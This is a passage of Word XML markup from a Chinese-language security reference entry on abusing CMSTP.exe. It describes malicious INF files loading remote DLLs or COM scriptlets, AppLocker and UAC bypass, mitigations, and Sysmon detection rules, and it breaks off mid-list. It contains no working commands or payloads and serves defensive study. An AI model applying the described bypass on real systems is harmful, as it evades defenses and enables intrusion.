            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A5BBD3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源：进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数，网络进程使用，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71234984" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否支持远程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C8522D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防御：应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D056C14" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Ye Yint Min Thu Htut</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Offensive Security Team</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>DBS Bank</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Nik Seetharaman</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Palantir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44100C1D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B2D6B32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587624CB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4F7CAC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于安装连接管理器服务配置文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装信息文件（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INF</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）作为参数，安装用于远程访问连接的服务配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E7276" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会向</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供带恶意命令的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INF</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。与</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00A21B67">
          <w:t>Regsvr32</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A21B67">
        <w:t>/ "</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Squiblydoo"</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能被滥用来从远程服务器加载和执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>小程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者还可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppLocker</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及其他白名单防御，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身是一个合法的、已签名的微软应用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329F63A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可能被滥用来绕过用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>户账号控制并通过自动升级的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INF</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的任意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7F559" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="55283BB3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="16EC2EED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7DD0FA88" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="14545D70" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03872B75" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用或</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739ACA6B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在给定环境中可能不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMSTP.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（除非用其安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VPN</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>连接）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6A288FF5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03916131" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B4A3D8F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>给定的系统或网络不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CMSTP.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，考虑使用应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来防止攻击者滥用它。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31279155" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55FF2FDC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DBFDCA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行和参数。将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最近调用与已知恰当参数及已加载文件的历史记录进行比较来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常和潜藏的攻击活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A3F351" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件来查看是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的滥用情况。检测策略可能取决于具体的攻击程序。规则如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA4875" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E65C70" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程有效负载的加载和执行—事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（进程创建）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:t>连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ParentImage</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMSTP.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DestinationIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是外部的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407AAF22" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E65C70" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>通过自动升级的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口检测用户账号控制绕过行为—事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ProcessAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00E65C70">
        <w:rPr>
